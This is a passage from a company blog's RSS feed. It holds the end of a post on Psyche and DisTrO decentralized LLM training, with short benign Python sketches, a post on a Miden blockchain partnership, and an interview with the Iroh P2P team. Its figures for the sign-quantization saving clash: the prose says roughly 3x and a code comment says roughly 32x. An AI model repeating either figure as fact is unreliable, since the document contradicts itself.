&lt;h2 id=&quot;the-core-technology-distro&quot;&gt;The Core Technology: DisTrO&lt;&#x2F;h2&gt;
&lt;p&gt;Psyche is made possible by &lt;strong&gt;DisTrO&lt;&#x2F;strong&gt;, a set of training optimizers developed by Nous Research. DisTrO reduces the amount of data exchanged between nodes during training by several orders of magnitude, enabling training over standard broadband connections.&lt;&#x2F;p&gt;
&lt;p&gt;The idea is conceptually similar to image compression (like JPEG): much of the essential information in a model’s gradient can be retained by transmitting only a few low-frequency components. DisTrO goes further by transmitting just the &lt;strong&gt;sign&lt;&#x2F;strong&gt; of each frequency amplitude, quantizing it down to one bit. This results in roughly a 3x further reduction in data transmission.&lt;&#x2F;p&gt;
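&lt;p&gt;As a conceptual sketch of the one-bit step (this is not the actual DisTrO implementation, only an illustration of sign quantization): each retained component is transmitted as a single sign bit, and the receiver reconstructs it using a shared per-message scale.&lt;&#x2F;p&gt;

```python
# Conceptual sketch (not the actual DisTrO code): quantizing each
# transmitted component down to its sign packs it into one bit, roughly a
# 32x reduction versus float32 per retained component; combined with
# keeping only a few low-frequency components, the total traffic drops by
# several orders of magnitude.

def quantize_signs(components):
    # one bit per component: 1 for non-negative, 0 for negative
    return [1 if c >= 0 else 0 for c in components]

def dequantize(bits, scale):
    # receiver reconstructs with a shared per-message scale
    return [scale if b == 1 else -scale for b in bits]

grads = [0.8, -0.31, 0.05, -1.2]      # toy gradient components
bits = quantize_signs(grads)
assert bits == [1, 0, 1, 0]
recovered = dequantize(bits, 0.5)
assert recovered == [0.5, -0.5, 0.5, -0.5]
```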
&lt;p&gt;Additionally, nodes can start training without immediately applying the updates from the previous training step. This means that network latency does not become a bottleneck, improving resource utilization and allowing decentralized training to approach the efficiency of centralized systems.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-p2p-layer&quot;&gt;The P2P Layer&lt;&#x2F;h2&gt;
&lt;p&gt;Networking for Psyche is handled by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;n0-computer&#x2F;iroh&quot;&gt;&lt;strong&gt;Iroh&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;, a protocol designed for decentralized applications:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Each peer is identified by a 32-byte Ed25519 public key, not an IP address.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Communication is end-to-end encrypted and authenticated.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Nodes behind NAT or firewalls connect using UDP hole-punching in approximately 90% of cases, with relays used as fallback.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Nodes participating in training runs share training metadata using &lt;strong&gt;iroh-gossip&lt;&#x2F;strong&gt;, which builds on the HyParView and PlumTree protocols. Training results are shared using the &lt;strong&gt;iroh-blobs&lt;&#x2F;strong&gt; protocol, which bundles gradient information into binary blobs and references them via content-addressed tickets.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;training-lifecycle&quot;&gt;Training Lifecycle&lt;&#x2F;h2&gt;
&lt;p&gt;Training in Psyche occurs in &lt;strong&gt;epochs&lt;&#x2F;strong&gt; (groups of training steps). Nodes can join or leave the network at the start or end of an epoch, reducing the opportunity cost for contributors.&lt;&#x2F;p&gt;
&lt;p&gt;At the beginning of each epoch, nodes download the current model (either from a HuggingFace repo or directly from other peers) and begin training. Some nodes act as &lt;strong&gt;witnesses&lt;&#x2F;strong&gt;, verifying received results using Bloom filters. If too few nodes remain active or witness quorum is lost, training is paused and checkpointed until new nodes join and resume the process.&lt;&#x2F;p&gt;
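&lt;p&gt;To see why Bloom filters fit the witness role, here is a minimal, generic implementation; it is a sketch of the data structure, not Psyche’s actual witness code. A filter answers “definitely not present” or “probably present”, which lets a witness attest to a large set of received results with a small, fixed-size summary.&lt;&#x2F;p&gt;

```python
import hashlib

class BloomFilter:
    # Compact set summary: membership queries may return false positives,
    # but never false negatives.
    def __init__(self, num_bits=1024, num_hashes=3):
        self.num_bits = num_bits
        self.num_hashes = num_hashes
        self.bits = bytearray(num_bits // 8)

    def _positions(self, item):
        # Derive num_hashes pseudo-independent bit positions from the item.
        for i in range(self.num_hashes):
            digest = hashlib.sha256(bytes([i]) + item).digest()
            yield int.from_bytes(digest[:8], "big") % self.num_bits

    def add(self, item):
        for pos in self._positions(item):
            self.bits[pos // 8] |= 2 ** (pos % 8)

    def might_contain(self, item):
        # True only if every derived bit is set.
        return all((self.bits[pos // 8] >> (pos % 8)) % 2 for pos in self._positions(item))
```

&lt;p&gt;A witness can then share the filter instead of every raw result, and peers can check whether their own results were observed, at the cost of a tunable false-positive rate.&lt;&#x2F;p&gt;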
&lt;h2 id=&quot;verification&quot;&gt;Verification&lt;&#x2F;h2&gt;
&lt;p&gt;To verify that nodes are training correctly, selected nodes recompute the training step performed by another node and check that the reported gradient is accurate.&lt;&#x2F;p&gt;
&lt;p&gt;Due to the non-deterministic nature of training (from rounding errors, hardware differences, etc.), the system must find a balance between accepting minor differences in output and detecting actual faults or adversarial behavior. Various similarity metrics—such as Jaccard index, Manhattan distance, and Hamming distance—are being explored.&lt;&#x2F;p&gt;
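&lt;p&gt;The trade-off can be made concrete with a toy tolerance check. The metric and threshold below are hypothetical choices for illustration only; as noted, the metrics actually used are still being explored.&lt;&#x2F;p&gt;

```python
def manhattan_distance(a, b):
    # Sum of absolute element-wise differences between two gradient vectors.
    return sum(abs(x - y) for x, y in zip(a, b))

def results_agree(claimed, recomputed, tolerance=1e-3):
    # Accept small numeric drift from rounding or hardware differences,
    # but reject gradients that deviate beyond the tolerance budget.
    return tolerance * len(claimed) >= manhattan_distance(claimed, recomputed)

honest = [0.5, -0.25, 0.125]
noisy = [0.5000001, -0.2499999, 0.125]  # benign nondeterminism
forged = [5.0, 2.0, -3.0]               # adversarial update

assert results_agree(honest, noisy)
assert not results_agree(honest, forged)
```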
&lt;h2 id=&quot;why-this-matters&quot;&gt;Why This Matters&lt;&#x2F;h2&gt;
&lt;p&gt;The current landscape of AI is dominated by a small number of entities with access to significant compute resources. This centralization limits who can participate in developing and steering the future of AI.&lt;&#x2F;p&gt;
&lt;p&gt;Our work with Nous Research on Psyche represents a meaningful step toward more open and equitable participation. It allows:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Efficient use of idle compute&lt;&#x2F;li&gt;
&lt;li&gt;Lower-cost training of custom models&lt;&#x2F;li&gt;
&lt;li&gt;Greater experimentation and model diversity&lt;&#x2F;li&gt;
&lt;li&gt;More transparency and less reliance on opaque corporate infrastructure&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;We believe AI should be owned by everyone. This partnership is a move in that direction. Lambda will work as hard as possible to build the new networks that make decentralized, open, and verifiable AI development practical, scalable, and accessible to all.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Lambda&#x27;s new strategic partnership with Miden: the Edge blockchain</title>
          <pubDate>Mon, 05 May 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-new-strategic-partnership-with-miden-the-edge-blockchain/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-new-strategic-partnership-with-miden-the-edge-blockchain/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambdas-new-strategic-partnership-with-miden-the-edge-blockchain/">&lt;p&gt;We are very proud to celebrate over 18 months of collaboration between Miden and LambdaClass. The partnership began by helping Miden develop the client, facilitating the execution and proving of transactions for the Miden network. Over time, our collaboration deepened, and we expanded our efforts to support the development of the protocol and node, focusing on various aspects. More recently, we’ve started assisting with the compiler effort, further expanding our involvement in the Miden ecosystem.&lt;&#x2F;p&gt;
&lt;p&gt;Miden is the edge blockchain: a rollup for high-throughput, private applications, powered by the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;0xPolygonMiden&#x2F;miden-vm&quot;&gt;Miden-VM&lt;&#x2F;a&gt;, a STARK-based virtual machine. It has been designed using ZK technology, aiming to achieve two goals simultaneously: private state management and high scalability. These are crucial properties for real-world applications, allowing users to choose the data they want to share and process a large number of transactions. The actor-based model allows for concurrent transactions and ensures that transaction data is not revealed in the blockchain, enabling digital cash and giving users the choice of which information to keep publicly in the ledger. Thus, Miden enables applications to scale efficiently with both public and private transactions, meeting their diverse requirements.&lt;&#x2F;p&gt;
&lt;p&gt;In Miden, accounts hold assets and can define rules for transferring them. The data can be public or private and is kept in a Miden node. Notes are a way to transfer assets and interact with other accounts; they contain a script that indicates how the note can be consumed. Notes can be transferred asynchronously and privately; if a note is private, only its hash is stored on the chain. An asset transfer happens in two steps: first, the sender generates a note and updates its internal state; second, the receiver executes a new transaction to consume the note and update its own state. Miden keeps track of the accounts’ state, the created notes, and the nullifiers for consumed notes.&lt;&#x2F;p&gt;
&lt;p&gt;The Miden-VM is a STARK-based virtual machine with its customized instruction set architecture (ISA), using ZK-friendly primitives to make proving efficient. The VM works with the MiniGoldilocks field and its extensions, which have fast arithmetic. With its specialized ISA, programs need to be written in Miden assembly language. The development and use of compilers for general-purpose languages, such as Rust, will enable us to write high-level code and then compile it to Miden assembly to prove it, simplifying the development of provable applications.&lt;&#x2F;p&gt;
&lt;p&gt;Achieving all these features requires a lot of engineering effort and thought, and Miden has made the right choices, focusing on what they want to offer users and clients, all while working fully open-source and sharing their work and insights with others.&lt;&#x2F;p&gt;
&lt;p&gt;Our enthusiasm for Miden stems from the fact that it provides an innovative approach for blockchains: it leverages fast client-side proving for compliant privacy. Its design and architecture, inspired by the actor model, is simple yet elegant and very powerful, facilitating parallel transaction execution and batching for an incredible increase in throughput and scalability with minimal state bloat. With a mature codebase that empowers developers to solve complex problems, it sits right at the core of Lambda’s values.&lt;&#x2F;p&gt;
&lt;p&gt;Looking ahead, we remain committed to advancing Miden’s mission and enabling all the possibilities it unlocks for users and developers alike.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>The Wisdom of Iroh</title>
          <pubDate>Wed, 09 Apr 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/the-wisdom-of-iroh/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/the-wisdom-of-iroh/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/the-wisdom-of-iroh/">&lt;p&gt;As we’ve written before, most of us at Lambda are internet natives. The formative experiences that made us who we are include meeting people on the other side of the world through IRC, sharing knowledge, media, and code via BitTorrent, Wikipedia, and version control systems, the birth of the first search engines, and the feeling that &lt;em&gt;everything&lt;&#x2F;em&gt; was accessible. We then grew up and were frustrated to find that this experience did not yet extend to the financial tasks of adult life, and that terms like &lt;em&gt;walled garden&lt;&#x2F;em&gt; better described the new state of our internet home.&lt;&#x2F;p&gt;
&lt;p&gt;This is why we get a double high when learning about projects like Iroh: an emotional tug from a project that enables building distributed systems in a way that gives users more agency, and a nerdy thrill from the technical challenges they’ve solved to achieve it.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-is-it&quot;&gt;What is it?&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;&quot;&gt;Iroh&lt;&#x2F;a&gt; is a distributed systems toolkit, focused on easily setting up reliable p2p connections. It includes facilities for establishing direct connections, moving data, syncing state, and pluggable application-level protocols. It’s working in production and has managed 200k concurrent connections and millions of devices on the same network with low service costs.&lt;&#x2F;p&gt;
&lt;p&gt;In their own words:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Iroh is a library for establishing the most direct QUIC connection possible between two devices. Every &lt;em&gt;endpoint&lt;&#x2F;em&gt; uses the public half of a cryptographic keypair to identify itself. Assuming at least one configured &lt;em&gt;relay server&lt;&#x2F;em&gt; is reachable, an endpoint keeps exactly one TCP connection to a “home relay” that other nodes use for connection establishment, and as a fallback transport. Iroh uses a suite of &lt;em&gt;discovery services&lt;&#x2F;em&gt; to resolve home relays &amp;amp; endpoint IDs. Connections between endpoints use QUIC ALPNs to distinguish between &lt;em&gt;protocols&lt;&#x2F;em&gt;, while &lt;em&gt;routers&lt;&#x2F;em&gt; automate the endpoint accept loop for protocol multiplexing.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;One of the things we like about Iroh is that it is clear on what it is about. It runs on QUIC, started out as a new implementation of IPFS, went through several iterations, and reduced its scope to better solve the problems they were facing. They wrote about this process in their &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;blog&#x2F;smaller-is-better&quot;&gt;Smaller is Better&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;blog&#x2F;road-to-1-0&quot;&gt;Roadmap&lt;&#x2F;a&gt; posts, and we fully agree that this is good engineering practice.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-can-iroh-be-used-for&quot;&gt;What can Iroh be used for?&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;n0.computer&#x2F;&quot;&gt;&lt;code&gt;n0&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;, the company behind Iroh, keeps a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;n0-computer&#x2F;awesome-iroh&quot;&gt;list&lt;&#x2F;a&gt; of projects building on it, but to get a quick idea: it can be of use in anything that needs file sync, p2p game streaming, distributed object storage, peer discoverability and swarm membership, local-first design, or compute job orchestration.&lt;&#x2F;p&gt;
&lt;p&gt;One of our partners, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;nousresearch&quot;&gt;Nous Research&lt;&#x2F;a&gt;, is using it in a decentralized training program that relies on iroh to manage communication between nodes training LLMs, sending messages between clients to advance the state of the network and share the gradients calculated by each node.&lt;&#x2F;p&gt;
&lt;p&gt;Today, we interviewed the team to get some insight.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;1-many-of-the-n0-team-members-are-ex-ipfs-or-libp2p-developers-one-of-the-first-questions-asked-is-how-iroh-compares-to-libp2p-and-as-we-understand-it-the-answer-is-related-to-having-a-tighter-focus-keeping-the-core-about-making-p2p-connections-that-just-work-and-moving-the-rest-to-application-level-protocols-such-as-iroh-gossip-blobs-and-docs-that-can-be-mixed-and-matched-as-desired-can-you-elaborate-on-this-process-and-how-reducing-scope-helped&quot;&gt;&lt;em&gt;1. Many of the n0 team members are ex-IPFS or libp2p developers. One of the first questions asked is how Iroh compares to libp2p and as we understand it, the answer is related to having a tighter focus, keeping the core about making p2p connections that just work, and moving the rest to application-level protocols such as iroh-gossip, -blobs and -docs that can be mixed and matched as desired. Can you elaborate on this process and how reducing scope helped?&lt;&#x2F;em&gt;&lt;&#x2F;h3&gt;
&lt;p&gt;b5: The process was one of slowly divesting ourselves of a lot of “p2p project baggage”. Most p2p projects end up defaulting into a boil-the-ocean stance where they try to ship one of everything: a DHT, transports, pubsub, RPC, and over time we’ve come to believe this is a big contributing factor to p2p projects feeling like half-baked prototypes. It clicked for us when our CTO dig pointed out “no one wants the nginx team to ship postgres”. A DHT is a huge undertaking, reliable sync is a huge undertaking, reliable transports are a huge undertaking. Sometime last year we realized it just wouldn’t be possible to ship all this stuff with the team we had, so we picked the transport layer, and are focused on integrating with other projects &amp;amp; the community forming near iroh for the things we can’t ship. Our bet is things will work better if a project like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;loro.dev&quot;&gt;loro&lt;&#x2F;a&gt; ships &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;loro-dev&#x2F;iroh-loro&quot;&gt;optional iroh support&lt;&#x2F;a&gt;, the loro team makes a truly robust CRDT, and we make a truly robust transport. There’s pressure on both teams to make the public APIs small &amp;amp; composable, to make integration easier.&lt;br &#x2F;&gt;
A lot of this is testament to just how incredible a technical feat &lt;code&gt;libp2p&lt;&#x2F;code&gt; is; especially when you see the sheer number of language implementations, it’s truly impressive. But that amount of work comes with a big API surface area, which makes it very challenging to port all of that functionality into a robust package that works well on a phone. It also creates the expectation that &lt;code&gt;libp2p&lt;&#x2F;code&gt; maintainers commit to delivering both a robust DHT &lt;em&gt;and&lt;&#x2F;em&gt; a reliable transport. When we say more focus, we explicitly mean fewer features that both work more consistently &amp;amp; are integrated across organizations.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;2-how-did-the-decision-to-use-quic-come-about-a-few-months-ago-some-research-indicated-quic-might-have-some-downsides-and-there-seems-to-be-anecdotal-evidence-of-hostility-to-the-new-protocol-from-network-engineers-does-your-team-have-opinions-wrt-to-any-aspect-of-this-are-there-any-indications-for-iroh-adopters-that-might-stem-from-quic-usage&quot;&gt;2. How did the decision to use QUIC come about? A few months ago some &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;dl.acm.org&#x2F;doi&#x2F;10.1145&#x2F;3589334.3645323&quot;&gt;research&lt;&#x2F;a&gt; indicated QUIC might have some downsides and there seems to be anecdotal evidence of hostility to the new protocol from network engineers. Does your team have opinions wrt to any aspect of this? Are there any indications for Iroh adopters that might stem from QUIC usage?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: the goals of QUIC closely resemble what we’re trying to do with iroh: ship new capabilities on the internet &lt;em&gt;with software&lt;&#x2F;em&gt; because changing the hardware is impractical. QUIC is trying to tackle the protocol ossification that set in because routers can inspect TCP headers, and doing that by dropping down to the UDP layer &amp;amp; working from there. Along with being aligned at a “spiritual” level, things like QUIC multipath support seem almost designed for our exact use case. It’s a young technology that we’re all-in on.&lt;&#x2F;p&gt;
&lt;p&gt;I haven’t heard much in the way of hostility from network engineers, but I’m not entirely surprised. QUIC is intentionally trying to reduce the visible surface area to routers &amp;amp; internet middleboxes, which I’m sure would be frustrating. I happen to be of the mind that internet middle boxes shouldn’t be messing with those packets in the first place, but hey, that’s just me 😄&lt;&#x2F;p&gt;
&lt;h3 id=&quot;3-you-ve-mentioned-that-iroh-has-seen-a-million-devices-on-the-same-network-is-this-in-relation-to-the-public-iroh-relays-or-in-another-context-what-are-the-scalability-limits-you-ve-seen-and-in-which-scenarios&quot;&gt;3. You’ve mentioned that Iroh has seen a million devices on the same network. Is this in relation to the public Iroh relays or in another context? What are the scalability limits you’ve seen and in which scenarios?&lt;&#x2F;h3&gt;
&lt;p&gt;The biggest numbers we’ve seen have come from app developers deploying iroh as part of an update to an existing app. Each of those has stressed iroh in different ways. We’ve shipped against those stress tests for the last 6 months. It’s by no means done, but it is giving us in-production feedback that’s critical as we work toward our 1.0 release later this year.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;4-iroh-gossip-is-particularly-interesting-as-a-modern-implementation-of-hyparview-and-plumtree-what-made-you-choose-these-protocols-have-you-done-load-tests-on-this-protocol-in-particular-what-is-your-approach-to-testing-and-load-testing-in-general&quot;&gt;4. Iroh-gossip is particularly interesting as a modern implementation of HyParView and Plumtree. What made you choose these protocols? Have you done load tests on this protocol in particular? What is your approach to testing and load testing in general?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: phones. If we’re going to make p2p work on mobile devices, “star” topologies that compensate for high network churn with lots of connections simply aren’t viable, which makes the active&#x2F;passive divide in PlumTree particularly appealing. As I’m writing this, someone in our discord is running a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;discord.com&#x2F;channels&#x2F;1161119546170687619&#x2F;1161119546644627528&#x2F;1357726363657834788&quot;&gt;2000 node iroh gossip stress test&lt;&#x2F;a&gt; using an erlang supervisor, so yes, it’s being tested! We also have a battery of smoke &amp;amp; simulation tests that run against the iroh gossip protocol as part of CI.&lt;br &#x2F;&gt;
Gossip has been getting more attention lately, which is driving us to put more time into it. Frando from our team has been actively working on stability as we speak.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;5-you-encourage-users-to-set-up-their-own-relays-for-their-networks-but-are-also-very-generous-with-the-three-public-ones-you-offer-aside-from-avoiding-the-rate-limits-why-use-private-relays-are-there-any-security-or-other-feature-considerations&quot;&gt;5. You encourage users to set up their own relays for their networks but are also very generous with the three public ones you offer. Aside from avoiding the rate limits, why use private relays? Are there any security or other feature considerations?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: It’s totally fine to use the public relays! Honestly, we’d love to see more use so we can stress them more :). As a gentle reminder for everyone: relay traffic is e2ee, so the relays can’t see traffic, but relays &lt;em&gt;do&lt;&#x2F;em&gt; have a list of nodeIDs, and list of connections they’re facilitating, which is privileged information. Many of our more serious users are using private relays to avoid exposing that information to the public, or even to number 0, which is things working as intended in our view. We have some plans in the works for a complimentary service that will make spinning up relays very easy. Stay tuned for that!&lt;&#x2F;p&gt;
&lt;h3 id=&quot;6-when-developing-distributed-systems-observability-becomes-a-prime-concern-iroh-doctor-seems-like-a-cool-tool-to-have-does-iroh-offer-other-facilities-for-observing-and-debugging-its-internals-or-the-application-what-role-does-iroh-metrics-play-in-this&quot;&gt;6. When developing distributed systems, observability becomes a prime concern. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;blog&#x2F;iroh-0-16-a-better-client#iroh-doctor-plot&quot;&gt;Iroh-doctor&lt;&#x2F;a&gt; seems like a cool tool to have. Does Iroh offer other facilities for observing and debugging its internals or the application? What role does Iroh-metrics play in this?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: We’re actively working on this. Gathering actionable network metrics in a p2p system is critical as we make p2p a mature, reliable thing. We’ll have way more to say on this one in the coming months.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;7-p2p-systems-usually-disclose-the-ip-addresses-of-the-participating-nodes-and-iroh-explicitly-chooss-to-give-applications-flexibility-in-what-if-anything-to-do-in-this-regard-what-choices-do-you-see-are-usually-taken-and-what-mechanisms-aside-from-vpns-can-applications-implement&quot;&gt;7. P2P systems usually disclose the IP addresses of the participating nodes, and Iroh explicitly chooses to give applications flexibility in what (if anything) to do in this regard. What choices do you see are usually taken, and what mechanisms (aside from VPNs) can applications implement?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: I should clarify that any connection within iroh will &lt;em&gt;always&lt;&#x2F;em&gt; end up exposing your IP address to the peer that you’re dialing, and to the relay server your node uses as its home. This is also true of &lt;em&gt;so&lt;&#x2F;em&gt; many services you use every day, so iroh isn’t new in this regard. With that said, yeah, a VPN is rarely a bad idea, and we explicitly run one-off tests between n0 staff where we start a big file transfer &amp;amp; switch the VPN on &amp;amp; off during transfer to confirm it works (spoiler: it does).&lt;br &#x2F;&gt;
The implications of connecting users will be different for each application, but we generally ask folks to use their heads: if your app is 5-100 person invite-only chat rooms, then it makes sense to couple iroh connections with room memberships. If your app is, say, twitter, then you might need to introduce a new opt-in mechanism that makes it clear to the user that you’re disclosing something that might be abused.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;8-the-local-first-software-movement-prioritizing-user-data-being-stored-and-processed-on-their-own-devices-rather-than-relying-on-cloud-servers-is-new-and-slowly-gaining-traction-do-you-see-iroh-being-used-in-this-context-or-are-most-of-the-main-users-focused-on-other-use-cases&quot;&gt;8. The local-first software movement (prioritizing user data being stored and processed on their own devices rather than relying on cloud servers) is new and slowly gaining traction. Do you see Iroh being used in this context or are most of the main users focused on other use cases?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: YES. we &amp;lt;3 local first in a big way, and think p2p is the only way to get to software that is both local first and networked. The thing user agency, p2p, and local first all have in common is shipping more capabilities to the end-user’s device than we traditionally get with today’s “view layer on an API” apps.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;9-coupling-iroh-with-a-crdt-such-as-automerge-seems-to-be-a-common-pattern-iroh-docs-seems-geared-to-be-a-distributed-kv-store-but-is-based-on-range-based-set-reconciliation-do-you-see-these-higher-level-usage-patterns-being-codified-as-other-protocols-are-there-other-protocols-in-development-or-do-you-see-any-particular-pattern-as-a-likely-future-protocol&quot;&gt;9. Coupling Iroh with a CRDT such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;automerge.org&#x2F;&quot;&gt;automerge&lt;&#x2F;a&gt; seems to be a common pattern. Iroh-docs seems geared to be a distributed KV store but is based on range-based set reconciliation. Do you see these higher-level usage patterns being codified as other protocols? Are there other protocols in development, or do you see any particular pattern as a likely future protocol?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: yes, iroh + automerge is definitely “using iroh as intended”, and you get at a good point: there are patterns like message bootstrapping, incremental updates, and pairwise reconciliation that are common across a bunch of these protocols. To be able to actually have those protocols share abstractions for these patterns, we’d need a more robust story for protocol composition than we currently have, because we’d need a way for a protocol to express dependencies &amp;amp; do protocol version matching across the set of registered protocols at compilation time. Even then, it would require buy-in from projects like automerge, which really isn’t a goal of ours right now.&lt;br &#x2F;&gt;
I think it’s going to take years, but I do think we’ll get to a place where we declare a dependency graph of protocols, the compiler will be able to tell you if you have a version mismatch, and we’ll be able to further decompose these patterns as a community. I’m doing some experiments in this direction on the side, but don’t expect to see anything in this department before we cut iroh 1.0.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;10-you-ve-written-about-the-challenges-of-using-async-rust-and-we-can-certainly-relate-in-our-experience-greenspun-s-tenth-rule-applies-transmuted-to-distributed-systems-sometimes-called-virding-s-rule-any-sufficiently-complicated-concurrent-program-in-another-language-contains-an-ad-hoc-informally-specified-bug-ridden-slow-implementation-of-half-of-erlang-what-is-your-experience-with-the-actor-and-message-passing-approach-both-in-rust-when-implementing-iroh-and-more-generally-when-using-iroh-to-build-systems-that-communicate&quot;&gt;10. You’ve &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;blog&#x2F;async-rust-challenges-in-iroh&quot;&gt;written&lt;&#x2F;a&gt; about the challenges of using async rust and we can certainly relate! In our experience Greenspun’s tenth rule applies transmuted to distributed systems (sometimes called Virding’s rule) “Any sufficiently complicated concurrent program in another language contains an ad hoc informally-specified bug-ridden slow implementation of half of Erlang.” What is your experience with the actor and message passing approach, both in Rust when implementing Iroh and more generally when using Iroh to build systems that communicate?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: lol yes very much to the half-Erlang. We’re very much in that uncanny valley right now with iroh. Most of the internal guts are implemented with actors, but we haven’t formalized that into an actor abstraction, and it’s unclear that we ever will. Where that pain is felt more acutely is at the protocol level. At the level of protocol development, it would be very nice to have easy-to-implement patterns that abstract around distributed fault tolerance &amp;amp; give you that “fail whenever you want” characteristic that supervisor trees bring. The protocol dev is also at the right height in the stack, dealing with logical messages instead of raw packets.&lt;br &#x2F;&gt;
We’re still working on the groundwork of getting tutorials in place for writing a protocol in the first place, but I’d love to see us spend more time cooking up recipes for protocol development atop an actor model abstraction.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;11-your-roadmap-is-quite-clear&quot;&gt;11. Your &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.iroh.computer&#x2F;roadmap&quot;&gt;roadmap&lt;&#x2F;a&gt; is quite clear: webassembly support being oft-requested and recently merged, and better support on the way for clients wanting to use Iroh in browsers without having to send all data over relays. Some notable items in the more distant roadmap are a spec and FFI integrations. Can you elaborate on their importance and&#x2F;or motivation? Do you have an estimate on when 1.0 is due, and any comments on what motivates the upcoming features? What are you most excited about?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: The spec part is fun because iroh can be pretty easily expressed as a composition of existing specs, which is our plan. In our view, 1.0 means you know clearly what the thing is and how it &lt;em&gt;should&lt;&#x2F;em&gt; behave, so why not write that down in a spec? That said, we’re far more concerned with working software than a spec, and see taking the time to write out a spec as a means of confirming we’ve considered everything we need to as part of a 1.0 push, and can communicate that consideration clearly. As for FFI bindings, we &lt;em&gt;really&lt;&#x2F;em&gt;, &lt;em&gt;really&lt;&#x2F;em&gt; want to get to languages outside of rust, but have a lot of work to do here. More on FFI in the July-August time range. The current plan for 1.0 is sometime in September.&lt;br &#x2F;&gt;
As for excitement, Divma &amp;amp; Floris on our team have been hard at work on support for QUIC multipath for &lt;em&gt;months&lt;&#x2F;em&gt;. It’s a huge undertaking, and we’re all very excited to see it come together.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;12-are-there-any-bindings-or-plans-for-bindings-to-other-languages-iroh-ffi-seems-to-provide-support-for-python-what-is-it-s-status-and-do-you-plan-to-offer-official-support-for-any-other-languages&quot;&gt;12. Are there any bindings or plans for bindings to other languages? Iroh-ffi seems to provide support for Python; what is its status, and do you plan to offer official support for any other languages?&lt;&#x2F;h3&gt;
&lt;p&gt;b5: Yes, we have plans, but need to figure out some hard stuff around what basically amounts to duck-typing in UniFFI bindings first :)&lt;&#x2F;p&gt;
